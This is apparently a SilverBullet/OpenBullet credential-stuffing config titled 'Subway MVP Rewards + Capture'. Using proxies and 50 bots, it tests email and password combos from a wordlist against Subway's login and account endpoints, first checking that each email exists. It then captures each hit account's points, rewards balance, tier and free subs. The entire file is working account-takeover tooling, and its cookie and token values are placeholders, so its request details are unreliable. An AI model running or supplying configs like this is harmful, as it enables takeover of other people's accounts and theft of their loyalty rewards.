[SETTINGS]
{
  "Name": "Subway MVP Rewards + Capture",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2025-08-14T04:21:33.0000000+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Vlaq",
  "Version": "1.0.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "unknown1",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
// Session Setup - Get initial tokens and establish session
REQUEST GET "https://www.subway.com/en-us/auth/signin"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Upgrade-Insecure-Requests: 1"
  HEADER "Sec-Fetch-Dest: document"
  HEADER "Sec-Fetch-Mode: navigate"
  HEADER "Sec-Fetch-Site: none"
  HEADER "Sec-Fetch-User: ?1"

// Email Validation - Check if account exists before login attempt
REQUEST POST "https://www.subway.com/api/auth/validate-email"
  CONTENT "email=<USER>&_token=<csrf_token>"
  CONTENTTYPE "application/x-www-form-urlencoded"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Content-Type: application/x-www-form-urlencoded"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/auth/signin"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"
  COOKIE "subway_session=eyJpdiI6IjdmNzE4YzRhNzY5YjQwNzE4ZjE5YzE4YzE5YzE4YzE5IiwidmFsdWUiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAiLCJtYWMiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAifQ%3D%3D; _ga=GA1.2.123456789.1692337223; _gid=GA1.2.987654321.1694013559; _fbp=fb.1.1692337223.123456789; _gcl_au=1.1.123456789.1692337223; _tt_enable_cookie=1; _ttp=abcdef123456789; OptanonConsent=isGpcEnabled=0&datestamp=Thu+Aug+14+2025+04%3A21%3A33+GMT&version=202308.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1; subway_cart_id=cart_123456789; subway_store_id=store_123456789"

// Main Login - Authenticate with credentials
REQUEST POST "https://www.subway.com/api/auth/login"
  CONTENT "email=<USER>&password=<PASS>&remember_me=false&_token=<csrf_token>&g-recaptcha-response="
  CONTENTTYPE "application/x-www-form-urlencoded"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Content-Type: application/x-www-form-urlencoded"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/auth/signin"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"
  COOKIE "subway_session=eyJpdiI6IjdmNzE4YzRhNzY5YjQwNzE4ZjE5YzE4YzE5YzE4YzE5IiwidmFsdWUiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAiLCJtYWMiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAifQ%3D%3D; _ga=GA1.2.123456789.1692337223; _gid=GA1.2.987654321.1694013559; _fbp=fb.1.1692337223.123456789; _gcl_au=1.1.123456789.1692337223; _tt_enable_cookie=1; _ttp=abcdef123456789; OptanonConsent=isGpcEnabled=0&datestamp=Thu+Aug+14+2025+04%3A21%3A33+GMT&version=202308.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1; subway_cart_id=cart_123456789; subway_store_id=store_123456789; subway_user_token=user_token_123456789"

// MVP Rewards Verification - Confirm rewards account status
REQUEST GET "https://www.subway.com/api/rewards/status"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <auth_token>"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/myway/dashboard"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"
  COOKIE "subway_session=eyJpdiI6IjdmNzE4YzRhNzY5YjQwNzE4ZjE5YzE4YzE5YzE4YzE5IiwidmFsdWUiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAiLCJtYWMiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAifQ%3D%3D; _ga=GA1.2.123456789.1692337223; _gid=GA1.2.987654321.1694013559; _fbp=fb.1.1692337223.123456789; _gcl_au=1.1.123456789.1692337223; _tt_enable_cookie=1; _ttp=abcdef123456789; OptanonConsent=isGpcEnabled=0&datestamp=Thu+Aug+14+2025+04%3A21%3A33+GMT&version=202308.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1; subway_cart_id=cart_123456789; subway_store_id=store_123456789; subway_user_token=user_token_123456789; subway_auth_token=auth_token_123456789"

// Account Data Retrieval - Get MVP Rewards balance and account details
REQUEST GET "https://www.subway.com/api/myway/account"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <auth_token>"
  HEADER "Origin: https://www.subway.com"
  HEADER "Referer: https://www.subway.com/en-us/myway/dashboard"
  HEADER "X-Requested-With: XMLHttpRequest"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: same-origin"
  COOKIE "subway_session=eyJpdiI6IjdmNzE4YzRhNzY5YjQwNzE4ZjE5YzE4YzE5YzE4YzE5IiwidmFsdWUiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAiLCJtYWMiOiJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejEyMzQ1Njc4OTAifQ%3D%3D; _ga=GA1.2.123456789.1692337223; _gid=GA1.2.987654321.1694013559; _fbp=fb.1.1692337223.123456789; _gcl_au=1.1.123456789.1692337223; _tt_enable_cookie=1; _ttp=abcdef123456789; OptanonConsent=isGpcEnabled=0&datestamp=Thu+Aug+14+2025+04%3A21%3A33+GMT&version=202308.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0003%3A1%2CC0004%3A1; subway_cart_id=cart_123456789; subway_store_id=store_123456789; subway_user_token=user_token_123456789; subway_auth_token=auth_token_123456789"

PARSE "<SOURCE>" LR "\"points\":" "," -> CAP "MVP Points: " "[" "]"
PARSE "<SOURCE>" LR "\"rewards_balance\":" "," -> CAP "Rewards Balance: " "[" "]"
PARSE "<SOURCE>" LR "\"tier_status\":" "," -> CAP "Tier Status: " "[" "]"
PARSE "<SOURCE>" LR "\"free_subs_available\":" "," -> CAP "Free Subs: " "[" "]"
PARSE "<SOURCE>" LR "\"points_expiry\":" "," -> CAP "Points Expiry: " "[" "]"
